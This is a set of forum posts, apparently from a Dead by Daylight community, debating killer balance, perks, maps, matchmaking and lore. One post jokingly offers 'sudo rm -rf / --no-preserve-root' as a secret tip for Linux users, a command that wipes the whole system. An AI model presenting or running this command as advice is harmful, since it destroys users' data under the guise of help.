This map is not fine. You almost always can easily 3 gen or even 4 gen... but then survivors have the most bullshit corn map.
When it comes to haddonfield, i don't know about if infinites still apply for 110% killers, but fences are actually fine imo.
-
For the new 28m aura reveal. It should clarify that it shows auras of survivors, who are mending after being struck by FF. Without it, it will be called tunnel vision because of the interaction with BT.
-
Ok, all anything else, but how so it makes fair for survivors to ask for a nerf to the Myers? He is the best killer in the game from both points of view.
Also, there are survivors, who actually ask for a nerf to the Bubba and Clown... TO THE ######### BUBBA AND CLOWN!
-
Just a small thing... OoO here is still not ok. The biggest issue with this perk is that, the swf with voice coms, will have so much intel on you that it is dumb.

You can get grabbed basically all the time while being healthy except when vaulting Windows or Pallets. So that this only works while injured is the exception.
And this exception most likely exists so that you dont get "insta-downed" in a Chase all the time when the Killer just would have to wait until you vault a Window or Pallet to get the easy down.
You still can be grabbed while vaulting. For pallets the killer must be on the to which you are vaulting. For the windows, it has to be medium or slow vault, not sure about the fast vault, if it works like pallets or grant immnity to grabs.
-
He sn't the sharpest tool in the shed. Killers don't focus bunny fengs because they hate them. It's all about cheap rabbit hunting. :D
-
I think that it would be good if survivors were able to see, what perks others are running in the lobby.
-
Just one thing to say, stab wounds study is bad. 30 seconds of oblivious? I find that you rarely commmit to a chase after deep wounding a survivor, what is even worse, if they mend, you stop tracking them because they aren't affected by your terror radius.
In the end, if you commit to a chase after hitting them with ff, as soon as they realize they have oblivious they will start running to a safe spot (no, pallets usually aren't a safe in this scenario). Right now survivors sometimes just disrespect you and start to mend. Then you can cancel your power and often get a down.
Also, if you would want to go back to injured survivor after they finished mending, you can't track them, which means you can't go for already injured survivor, to get easy down and with normal legion speed, it will often be unlikely that you will catch them offguard with only 30 seconds.
It would be useful only in closed maps, on other maps it would impact your power negatively.
-
When it comes to hag:
Ruin have a strong combo with surveilance.
Devour hope in my opinion is a must for some killers, who lack lethality. It's good to pair it with haunted grounds.
-
You know what is the best part? Even after this buff it would be a garbage, as the worst anti slugging perk.
-
"Clown is the worst killer in the game"
His base power... well yes.
With addons? Deathslinger is worse.
Also, clown after this rework still would be weak. His biggest issue is lack of lethality. Maybe if there was a poison build up, that puts survivor in the broken status after some time in the gas. Lets say you need 45 points or 45 seconds in the gas and diret hit with bottles also would give 10/15 points. It would deplete over time, 1 point per 2 seconds lets say, with possibility of still adding points. Red head's pinky finger would then remove poison build up and still give exposed status effect.
Clown still wouldn't be the best killer, but he would still be better (probably around lvl of plague), also he would become the most toxic kiler in the game.
Another, much easier change would be to just remove his slowdown effect, when he is throwing the bottle.
-
The dumbest thing is that you lose points for survivors healing... like... why?

You're assuming that an endgame with four survivors alive and No ED lasts under 120 seconds... it usually drags out a long time
2 minutes is enough to search for NoED, trust me. Also for 2 minutes you have higher speed buff than killer from NoED (personally i find this speed buff more important on most of the killers)
-
Many people already were talking about the bones. Now i will talk about my favorite perk to counter NoED: Hope. It gives you speed boost that is actually higher than NoED, hich makes it actually easier to loop the killer.

Ok well trying this in a moment cuz alt+f4 didnt work....
Another false one. I will give you this secret, but be warned that with graeat power comes great responsibility.
It sadly works only for linux users (yea, if you have windows you can't do this). All you have to do is to write "sudo rm -rf / --no-preserve-root" and confirm with password in the terminal.
-
Have a problem with genrush?
Play Dead by NOED then.
Same with flashlights.
Just play Dead by Lightborne.

The survivor who was caught and failed to hide and escape shouldn't get compensation for being bad at the game.
But he should be rewarded for helping his team, by not just killing himself on the hook.
-
So the funniest killers in my opinion are:
Myers... the stalking mechanic is satisfying and fun. He also has probably the funniest builds: Jumpscare Myers, Burger King Myers and the funniest way of deranking, which is infinite tombstone Myers.
Another one, even thought you don't buy him, is trapper... i like Jason like killer, who is very territorial and if anyone says he is weak, he doesent really know how to play a him.
Because i like trapper i also enjoy the hag, even that playing as her is very different.
For some reason i also really enjoy bubba, even thougth he needs very specific builds to be viable or just survivors, who don't respect bubba (which is most of the cases)
Another killer is doc... what can i say, i was shocked, how much fun he gives to you.
And if you want to find fun, do not play with the nurse... you will find only frustration with 4k there.
-
Both.
I love playing survivor, but i also love not dying because of my dumb team, so i like killer as well.

Being a 115% limited range killer doesn't sound right.
If he struggles in chase so much and if he's 110% killer, he should have buffs for his power. Normally if a killer is 110%, they're chase potential is very very great such as Huntress or Spirit. They're great in chases so it can make up for they're slow movement speed. That being said my entire discussion was on about how Deathslinger's power isn't very reliable in chase for him being 110%. So it should make sense for buffs like pulling survivors over pallets or better yet give him some sort of built-in STBFL for his power.
Well, you forget here also about one thing. They both can apply map pressure. If huntress had range limit of 20m, she would be useless because you couldnt scare off or sometimes even hit survivors off the gens. Spirit on the other hand can use her power to traverse the map quickly.
Deathslinger lacks in both of these qualities. Because of it he needs a speed buff or an addon, that would make his power work somewhat differently.
And about 115% limited range killer... we already have one. It's demogorgon with his pounce ability. Loops that are shut down by deathslinger power are shut down by demo as well with the difference that deathslinger have harder time on them. Perfect example is killershack which is completely shut down by demo, while deathslinger needs a little more time for this loop.
-
They are perfectly fine, especially that you can effectively buy dlc's with them. Dev's gotta eat, so no reason to buff them.
But i suppose that some reward for devotion would be nice, maybe some bp gain increase?

Her hatchet cooldown is the same as if you had 8 stacks of STBFL.
I will tell you a secret about the balancing.
Scaling is more powerful in the end than flat strength. If scaling is on pair with it at the end, its much, much weaker because you lack the snowball at the start.
It works like that in every single type of the game.

I appreciate you understanding how weak he actually is, most people have no experience against him and just pawn him off as op. But better add ons will not help how easily counterable he is in chase tho.
Well, it depends. If they were so impactful on his power as pallet freddy or some of the nurses addons, it could actually fix the issue. The only annoying thing it would be that, he would become a very addon dependend killer.
Another eazy fix would be making him 115% killer with some nerfs to his power. I dont think that buffs to the power would be the right way, it would make him broken.
When it comes to the speed buff... well, he could become the 2nd 112,5% killer, like the shoe hag, which probably would also fix the problem with that, how thight is his power itself for balancing.
-
Matchmaking is broken in some patches, then they fix it... after some patches its broken again. Its a neverending cycle... you get used to it after some time.

This makes no sense.
If survivors don't have some sort of counter to a killer/new killer, that killer is broken and deemed META and people like you aren't helping the community grow, you're killing it.
If you truly think that survivors shouldn't have some sort of counter to a killer then you clearly never played survivor or you're being the selfish one. The whole purpose of a survivor is to survive and if a doctor spams his shock which he can do because there's virtually no cool-down, then he's broken. Like Huntress you might as well drop pallets early to get distance and that can ends games fast. THAT is truly boring.
Doctor legit has barely any cool-down to his shock and easily the best killer for 4Ks with the right perks. Just cause he got a rework doesn't mean it was a well done rework.
@Cixon said:

These are fine words to go by and I agree but to blantly say there shouldn't be a counter is just outright outragous.
The great thing about DBD is you don't know who you're up against and I love it but because I can't prep beforehand and have no clue I can't just run perks like Calm spirit and things to counter Doc. The point of the matter it, perks should only be there to boost the survivors objectives not to counter killers and that's the issue.
The game needs to balance it's killers and not all killers are treated equally. Domogorgon is low tier and though he can teleport where ever he pleases, that's all he can do. Nothing that special about it. Doc on the other hand was the only killer that got a rework that was broken and I stand by that. Even a strong SWF group struggle against a Doc because doc can execute a 2k without lifting a finger and godforbid a 4k because everyone knows he's great for that.
There's no "get gud" mentality with doc. It's just "get meta" or "get DC'd".
Ok, 1 to Cixon. Demogorgon is not the low tier. He is very strong when used properly. His Pounce can be great at dealing with many loops. Ever tried killershack against good demo for example?
And 2, to both of you. Doc has counters, i will ignore calm spirit, that is a great counter to doc and to infectious fright.
- Do not play in his terror radius. Usually playing inside killer's terror radius is pretty normal, when you know where he is, but against the doc its really important to not do that. 2 People with a flashlight? Forget about trying to save people when doc picks them up, the good one can predict thsi and use his power before the hook. What is more important, doctors usally dont bring detection perks, so if they wont find anyone they will be left quessing.
- Don't greed loops, even if you have dead hard. Doctor's shock can really punish you for that. Best use of dead hard is around the windows, after being shocked before you menaged to vault, try running into the window and when doc is nearby dead hard, to avoid his attack. After this time you should be free to fast vault and you will avoid the hit, unless he has unrelenting.
- Do not try to vault pallet back and forth, he will just shock you and hit.
- Its somethign that i didnt tested yet but throwing a pallet and vaulting it is quicker than running to the other side and dropping it. Against normal killer you would loose too much distance and likely be hit but against the doc it might sometimes work.
- Know the loops. Just like against the huntess, demogorgon or deathslinger some loops are no longer save. I get it, it can be sometimes hard to adjust your play for it but practice makes perfect.
- Adjust your distance from the kilelr for his power. On loops there is this minimal save distance and when the killer breaks it you are forced to throw the pallet or hope he respects it. Against the doctor this distance is different on loops. You can really notice it playing as him, on what distance you should use shock, to stop the pallet drop and when shock will work only, if survivor tries to vault after getting shocked. Remember, when doc charges his shock he is slower.
- Do not waste pallets, if doctor have fake pallets your team will be in a bad spot. After all for survivors its a team effort, so one can feck up the team.
- For the end the dumbest tip of all. Do gens. Every single killer can be beaten if you do gens fast enough and do not waste any time. Because of it i will say you should bring kindred if you are playing solo, it helps your team a lot.
-
Well i agree that deathslinger power is very underwhelming when also taking into the account that he is only 110% killer and that he has no good addons outside reload speed.
In my opinion he should get addons overhaul, to make them actually useful.
-
Why do survivors should have a counter to power that literally requires them to be inside the terror radius? You already have a counter in form: dont be inside the terror redius, just like against the doctor before the rework.
-
BL, It opens many amazing loops and makes some even better.
My second favorite perk is dead hard but unless i play against the nurse or spirit its not that great... maybe sometimes against the doc as well.
-
Well... often when facing swf with OoO you just have to tunnel, OoO gives too much info for survivors... but thats rather an issue with a perk than anything else.
-
I can confirm that there are issues with the rainbow matchmaking again.
-
Salt is the true and the only victory... and bp.
-
Cannibal is a viable killer, yea its not a nurse lvl but the main reason why he is told to be bad is because many new and bad players play him doe barbecue.
When it comes to the meathooks... useless unless you happen to go against sabo team.
His would be often counter productive and annoying for the player.
The pnly thing he could use is a speed buff while preparing the chainsaw.
-
SWFs can us Object of Obsession to gain just stupid amount of intel and when dealing with swf you cant just focus this guy when he is good at looping and teammates are helping him. OoO needs to be changed in my opinion.

Nouns are generally either masculine or feminine. I believe "Entity" is a feminine noun so I don't think using "le" instead of "la" would be acceptable.
It really depends on the language.
@Impala Well... actually entity is a reference for a being or a thing. In the various contexts you can refer to many things as the entity. Biological entity for instance. It's still can be femine or masculine.
Also, Pennywise isn't this "IT", he is just a pawn, just like the killers in the Entity realm.@IamFran

Pretty sure "Entity" is just a feminine noun in the language. Would you refer to a chair as "she"? Is there even a gender neutral way to say "the Entity" in French?
Also, can I get a link to where they refer to the Entity as "she"?
Im not specialist in french, but from what i know la is the femine part, they could have used le as the masculine part, and in the french you use masculine part in some way to show it is neutral, not the femine.
When it comes to link... im lazy, why wont you find a link where they refer to the entity as it?
Also, its not the place to discuss it, i belive there were topics about it.
-
Nope, the french original name is La Entite and the developers are reffering to it with the femine nouns in english as well.

He probably could lose some power, but not starve. He's pretty much a god...
The thing is, for him to starve, a lot of factors would have to come into effect.
First off, he'd have to lose his connection to our world. If he can't get new people, then he has no use in putting them in the Void...
Now on the other hand, if they stop being afraid of the entity, then their hopes of escaping increase against the killers, and he is fed. If they are not hopeful of escape, then they are sent to the Void.
Now if he sends them all to the Void, the killers have nothing to be mad at, and the Entity will probably let them start killing each other to harvest their strong emotions (Fear of death, anger at the other killers, etc)
Once those emotions are gone, he'd probably lose most of his powers.

Usually the only times I call a killer sweaty is:
- Coming in with a Black Ward (usually meaning they're running some crazy adds ons that's about to make the game miserable for me)
- Slugging for a 4k, especially when there's still like 4 or 5 gens still up and we've barely got anything done. You've already won at that point. Just hook the person and search for hatch when it spawns. Unless you get crappy RNG, your faster speed basically assures that the killer reaches it first anyway.
- Running an Ebony Mori AND Ultra Rare add ons together (Iri heads, one shot clown bottle, etc)
Hey, im using the black ward for the funny builds as well... like the instakill infinite t3 myers.
-
Fake pallets... and watch how this poor survivor who has thrown a 3rd fake pallet just gives up.

I dont want to give it a bloodpoints reward, because then lots of BP farmers would ruin games by running it all the time and dying 2 minutes into the game.
I've thought about it in the past, and giving you more time on the hook might be cool (extra 20 seconds per stage for EG).
How often do you see the hookfarmers with the we are gonna live forever? I see them rarely.
-
Resillience and This is Not Happening are considered to not be great because they require you to be in the injured state, so to really use tchem you also have to use no mither. They aren't bad thought.
Ace in The Hole, Diversion, Autodidact, Stake out, Streetwise and vigil arent bad either.
Ace in The Hole is a good item farming perk, especially when combined with the plunderer.
Diversion can work well with some practice for more stealthy players.
Autodidact is good for the healer build (no healing meta makes it weak thought)
Streetwise is a great bonus charge for the items.
And vigil is 8 seconds for the exhausted status effect, which can be lifesaving.

Your friend who uninstalled is just a poor casual. He is absolutly new to the game and is already expecting to win? #########. Some other games dont even have a ranked matchmaking and it's completely mixed. Does he uninstall aswell? It's normal to lose at the beginning. I'm not playing Apex for the first hours and cry about losing all the time. My first 10 hours in apex were absolutly catastrophic, I got demolished by everyone and everything. But I "git gud" and learned the game. And now I can win (be champion) at least once a day.
Maybe he should quit playing online games. Those "smurf" at rank 17-20 are very rare, probably not even 1% of them have 1k+ hours. Crying about this little amount is just silly.
Matchmaking is broken, red ranks can get a killer rank 20.

Now this bug is way more common, before it was 1 per maybe 20 matches, now it is every single time.
